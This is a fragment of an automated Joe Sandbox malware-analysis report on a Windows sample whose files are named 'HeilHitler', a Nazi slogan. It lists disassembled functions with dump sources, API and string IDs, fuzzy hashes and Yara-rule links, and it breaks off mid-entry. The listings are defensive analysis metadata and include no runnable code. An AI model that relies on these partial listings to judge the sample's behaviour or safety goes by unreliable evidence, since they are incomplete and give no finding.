                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                            • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                            • Instruction ID: 3fcdcd1c0f0ea58bf7fcc9dfd958138af5f85b08eccddb40698e0f4ea41e857b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B651A332A08B428AEB748FA1D14526837A8FB54B84F945336DA6DABB95CF3CF450D701
                                                                                                                                                                                                                                            Function 00007FF633D6EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                            • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                            • Instruction ID: 8358b9b083ad9bcf205d14673147ecac64c4f19881dc2d13d781748a40487605
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0061A232908BC586DB208F65E4413AAB7A4FB947C4F444325EBAC57B99DF7CE194CB00
                                                                                                                                                                                                                                            Function 00007FFDFAF42833 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\async\async.c$T
                                                                                                                                                                                                                                            • API String ID: 0-2182492907
                                                                                                                                                                                                                                            • Opcode ID: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
                                                                                                                                                                                                                                            • Instruction ID: 6d9ff846f709a70c4ba6efee97e1ccec4dfdf331e73987838bb539aa2643e968
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40519C31B0A64382F725DB11D4209A96761EF49BC8F444535EAAD4BBEEDF3DE608D700
                                                                                                                                                                                                                                            Function 00007FFDFB006D50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: getnameinfohtons
                                                                                                                                                                                                                                            • String ID: $..\s\crypto\bio\b_addr.c
                                                                                                                                                                                                                                            • API String ID: 1503050688-1606403076
                                                                                                                                                                                                                                            • Opcode ID: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
                                                                                                                                                                                                                                            • Instruction ID: 1107d9d858874b926384c3682e7c38e57cef13016523e848d136273e00d04284
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2451D222B1AB8385FB249B11D820AB973A1EF51788F444135FBAE476EDDF3DE9419700
                                                                                                                                                                                                                                            Function 00007FFDFAF43841 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                                                                                                                                                                                                            • API String ID: 0-1729655730
                                                                                                                                                                                                                                            • Opcode ID: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
                                                                                                                                                                                                                                            • Instruction ID: a098da8ff921f157aea59a0ed32bb914f32103b35cf6b101f7cc1169ccc73b3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2316F36B0858382EB14DB59E461969A360FF85794F440135FEAC47BEEDF3DD6408B00
                                                                                                                                                                                                                                            Function 00007FF633D67E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,00007FF633D6352C,?,00000000,00007FF633D63F1B), ref: 00007FF633D67F32
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                            • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                            • Instruction ID: 1bc1189d81329e79b0f594df65f4b7a7ddf4bfb33ccbd971c0db40d7ffe78eff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B031E621619AC645FA219B61E8127AA7358EF84BE4F800331FE7D977C9EF3CD6059700
                                                                                                                                                                                                                                            Function 00007FF633D62810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                            • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                            • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                            • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                            • Instruction ID: cb4500abcac2290a2ecdb12b620301205265b60e94a368f1fe62eb829fa546cd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC21F772708B4191E7109B94F8467EA7360FB88784F805236EE8DA7756DF3CD255D740
                                                                                                                                                                                                                                            Function 00007FFDFAF41C76 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B5630
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
                                                                                                                                                                                                                                            • API String ID: 2248877218-3633731555
                                                                                                                                                                                                                                            • Opcode ID: 3ba81f49d5ceb9f4a6875a9e5438a20396f096326d0a69e27fc56574318964df
                                                                                                                                                                                                                                            • Instruction ID: f6d6f84cf84ee2acc74d58e90d127309f880433175ed186ab151b04d6e5563fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ba81f49d5ceb9f4a6875a9e5438a20396f096326d0a69e27fc56574318964df
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7021A122F09A8781EB10DB55E4209AAA764FF857A8F404131FA9C47BEDEF7DE154CB00
                                                                                                                                                                                                                                            Function 00007FFDFAF4139D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastsocket
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\bio\b_sock2.c$2
                                                                                                                                                                                                                                            • API String ID: 1120909799-2051290508
                                                                                                                                                                                                                                            • Opcode ID: 2ef5472a3713315c0ebdeb3789e1964bedc6f77517e54092a2e54a431cd722de
                                                                                                                                                                                                                                            • Instruction ID: 216444f340ece2a041aa93e494aad43fcf367d00912d2fd3bce3321f3556390d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ef5472a3713315c0ebdeb3789e1964bedc6f77517e54092a2e54a431cd722de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC01AD32B1858382E3109B25E4109AD72A0FF41BA8F604235FA7C47AEDCF3DEA01D740
                                                                                                                                                                                                                                            Function 00007FF633D7C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                                            • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                            • Instruction ID: 4011ab1016f224084199e4224510aeb5237c71053e27409bc8eec7eb2664b866
